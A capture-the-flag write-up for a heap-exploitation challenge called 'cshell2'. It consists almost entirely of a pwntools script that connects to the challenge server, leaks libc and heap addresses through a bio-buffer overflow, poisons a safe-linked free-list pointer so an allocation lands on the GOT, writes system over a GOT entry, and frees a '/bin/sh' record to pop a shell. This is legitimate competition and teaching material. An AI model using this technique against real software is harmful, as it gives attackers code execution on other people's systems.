Rating:

Detailed write-up (Korean): https://mi-sutga-ru.tistory.com/9
```
#!/usr/bin/python3
# MIsutgaRU

from pwn import *

# Connection to the challenge service. To run against a local copy of the
# binary instead, swap in the commented-out process() line.
# s = process("./cshell2")
HOST, PORT = "be.ax", 31667
s = remote(HOST, PORT)

def menu(index):
    """Wait for the menu prompt and choose option *index* (given as bytes).

    The prompt is recognised by the line that ends in ``user``; everything
    up to and including that newline is consumed.
    """
    prompt_tail = b"user\n"
    s.recvuntil(prompt_tail)
    s.sendline(index)

def add(index, size, first, middle, last, age, bio):
    """Menu option 1: create record *index* with a *size*-byte bio buffer.

    ``first``, ``middle``, ``last`` and ``bio`` are raw bytes; ``index``,
    ``size`` and ``age`` are ints that are rendered as decimal text.
    ``middle`` and ``last`` are sent *without* a trailing newline
    (presumably the service reads them with a fixed-length read -- confirm
    against the binary); every other field is newline-terminated.
    """
    menu(b"1")
    # (prompt to wait for, payload, whether to append a newline)
    exchanges = (
        (b"index: ", str(index).encode(), True),
        (b"minimum): ", str(size).encode(), True),
        (b"firstname: ", first, True),
        (b"middlename: ", middle, False),
        (b"lastname: ", last, False),
        (b"age: ", str(age).encode(), True),
        (b"bio: ", bio, True),
    )
    for prompt, payload, with_newline in exchanges:
        s.recvuntil(prompt)
        if with_newline:
            s.sendline(payload)
        else:
            s.send(payload)

def show(index):
    """Menu option 2: print record *index* and skip past a 976-byte ``A`` filler.

    The caller is expected to have filled the record's bio with
    ``b"A" * 976`` beforehand (see the ``edit`` call that precedes
    ``show(0)`` below). Whatever the service prints after that filler is
    left unread in the socket buffer for the caller to pick up.
    """
    menu(b"2")
    s.recvuntil(b"index: ")
    s.sendline(str(index).encode())
    filler = b"A" * 976
    s.recvuntil(filler)

def delete(index):
    """Menu option 3: free the record at *index*."""
    menu(b"3")
    s.recvuntil(b"index: ")
    idx = str(index).encode()
    s.sendline(idx)

def edit(index, first, middle, last, age, bio):
    """Menu option 4: rewrite every field of record *index*.

    ``first``, ``middle``, ``last`` and ``bio`` are raw bytes; ``index`` and
    ``age`` are ints. Unlike ``add``, all three name fields are sent with a
    trailing newline. The bio prompt advertises a maximum length, which is
    parsed and logged (plus 32 -- presumably header overhead) but never used
    to clip ``bio``: the bio is sent as-is, without a newline.
    """
    menu(b"4")
    # Newline-terminated fields, in the order the service asks for them.
    fields = [
        (b"index: ", str(index).encode()),
        (b"firstname: ", first),
        (b"middlename: ", middle),
        (b"lastname: ", last),
        (b"age: ", str(age).encode()),
    ]
    for prompt, payload in fields:
        s.recvuntil(prompt)
        s.sendline(payload)
    # "bio: (max N)" -- read N, drop the closing paren, log it.
    s.recvuntil(b"bio: (max ")
    advertised = s.recvuntil(")")[:-1]
    size = int(advertised) + 32
    log.info(hex(size))
    s.recvuntil(b"\n")
    s.send(bio)

def re_age(index, age):
    """Menu option 5: change only the age of record *index*.

    Defined for completeness; it is not called anywhere in this script.
    """
    menu(b"5")
    for prompt, value in ((b"index: ", index), (b"age: ", age)):
        s.recvuntil(prompt)
        s.sendline(str(value).encode())

# --- Fixed addresses from the target binary (non-PIE, per the values) ---
names = 0x4040c0 #bss address (the records array, per the author's note)
got = 0x404010  # GOT region; this is the only one of these actually used below
free_got = 0x404018  # individual GOT slots, kept for reference
puts_got = 0x404020
printf_got = 0x404030
malloc_got = 0x404040

# --- Stage 1: libc leak ---
#pause()
add(0, 1032, b"a", b"b", b"c", 10, b"A")
add(1, 2032, b"A", b"B", b"C", 20, b"B")  # larger middle record, freed next
add(2, 1032, b"aa", b"bb", b"cc", 30, b"C")  # presumably keeps record 1 away from the top chunk
delete(1)
# Refill record 0's bio with exactly the 976 bytes that show() skips over, so
# that whatever the service prints right after the bio is left on the wire.
edit(0, b"aa", b"bb", b"cc", 11, b"A"*976)
show(0)
# Six bytes read back and zero-padded to a qword: a pointer into libc.
# NOTE(review): presumably the freed chunk's bin link; the 0x1c7cc0 offset
# is specific to the remote libc build -- verify against the write-up.
leak = u64(s.recv(6).ljust(8, b"\x00"))
log.info(hex(leak))
libc = leak - 0x1c7cc0
log.info(hex(libc))

# --- Stage 2: heap leak ---
# Same filler minus one qword, then 0x801: presumably rewrites the size
# field of whatever lies directly after record 0's bio -- confirm layout.
edit(0, b"aa", b"bb", b"cc", 11, b"A"*968+p64(0x801))
add(3, 1032, b"A", b"B", b"C", 20, b"B")
# Inline variant of show(3) that stops at "last: " instead of the A filler.
menu(b"2")
s.recvuntil(b"index: ")
s.sendline(b"3")
s.recvuntil(b"last: ")
# Four bytes of a heap pointer; 0x643 is the assumed distance from the heap base.
heapbase = u64(s.recv(4).ljust(8, b"\x00")) - 0x643
log.info(hex(heapbase))
# Page index of the heap base (true division then int(); exact as long as the
# address fits in a float's 53-bit mantissa). Used as an XOR key below.
heap = int(heapbase/0x1000)
# libc symbols from fixed offsets -- build-specific, like 0x1c7cc0 above.
system = libc + 0x470d0
puts = libc + 0x71ab0
scanf = libc + 0x4cb40

# --- Stage 3: redirect an allocation onto the GOT ---
#pause()
add(4, 1032, b"/bin/sh", b"/bin/sh", b"/bin/sh", 10, b"/bin/sh")
add(5, 1032, b"/bin/sh", b"/bin/sh", b"/bin/sh", 10, b"/bin/sh")
delete(3)
delete(5)
# Overflows record 4's bio by one qword. Operator precedence: `+` binds
# tighter than `^`, so this is `got ^ (heap + 0x1)`, not `(got ^ heap) + 1`.
# NOTE(review): presumably a safe-linking-style mangled forward pointer for
# the freed neighbour; confirm that +1 matches the page that chunk lives on.
edit(4, b"/bin/sh", b"/bin/sh", b"/bin/sh", 20, b"A"*976+p64(got^heap+0x1))
add(6, 1032, b"/bin/sh", b"/bin/sh", b"/bin/sh", 10, b"/bin/sh")
# The next same-sized record is expected to land on `got`; its name/bio
# fields carry function pointers (system, puts, scanf) rather than text.
add(7, 1032, b"\x00", p64(system), p64(puts), 10, p64(scanf))
# Frees a record whose strings are all "/bin/sh"; presumably the GOT entry
# consulted by this free now points at system (inferred, not visible here).
delete(4)

s.interactive()

```

Original writeup (https://mi-sutga-ru.tistory.com/9).